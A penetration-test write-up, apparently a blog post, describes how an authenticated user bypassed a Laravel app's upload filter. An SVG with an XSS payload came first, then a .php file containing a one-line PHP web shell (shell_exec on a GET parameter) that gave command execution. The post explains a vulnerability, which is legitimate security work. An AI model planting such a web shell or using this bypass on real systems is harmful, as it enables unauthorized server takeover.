In this post, I will try to guide you through an example of the type of vulnerabilities you may encounter when performing a pentest. In this case, I managed to compromise a web application through a file upload and then execute remote code.
Analyzing the application
As part of the process I was provided with credentials for the application as a normal user. Upon logging in, I started by browsing through all the pages and examining the functionality of the app.
After clicking on several pages of the site, I looked at a page that allowed me to upload a document.
Nowhere does the application indicate what type of files can be uploaded, the first thing that came to mind was uploading an svg image with an xss payload. When I go to the image I see that it executes the xss.
Validation
Now I knew that the upload file worked, but I still wanted to see what Burp Suite showed me. When reviewing the request in Burp Suite, notice that the images were being placed in the following directory: / storage / clients.
Clicking on the name the file is saved with allows me to open the image in the path like https://site.com/storage/clients/73947/test.svg
In the Burp Suite request, I could also see that the session cookie returned by the server as laravel_session. Laravel is a PHP framework, so it already confirmed in which language the application was developed.
Proof of concept
Next step: bypass file upload with a PHP web shell. This was done by intercepting and manipulating the following POST request:
Now all that was required was a simple change to the filename parameter in Content-Disposition to include .php at the end of the jpeg filename. Then I also added a small code snippet to include a simple PHP backdoor as shown below:
<?php echo shell_exec($_GET[‘e’].’ 2>&1'); ?>
With the file loaded, now I just had to click on the image to verify that the shell was up.
After running the id command, the user you were logged in with was displayed.
Shell time
Now I needed a nicer shell. To do this, just copy a shell directly from github.
After this, I went back to the browser, navigated to https://site.com/storage/clients/1524485403/lmao.php and had my shell ready.
then we navigate a bit between the folders.
Summary
An authenticated user could bypass the file upload content filter to run arbitrary code on the operating system. This would affect the confidentiality and integrity of the stored data.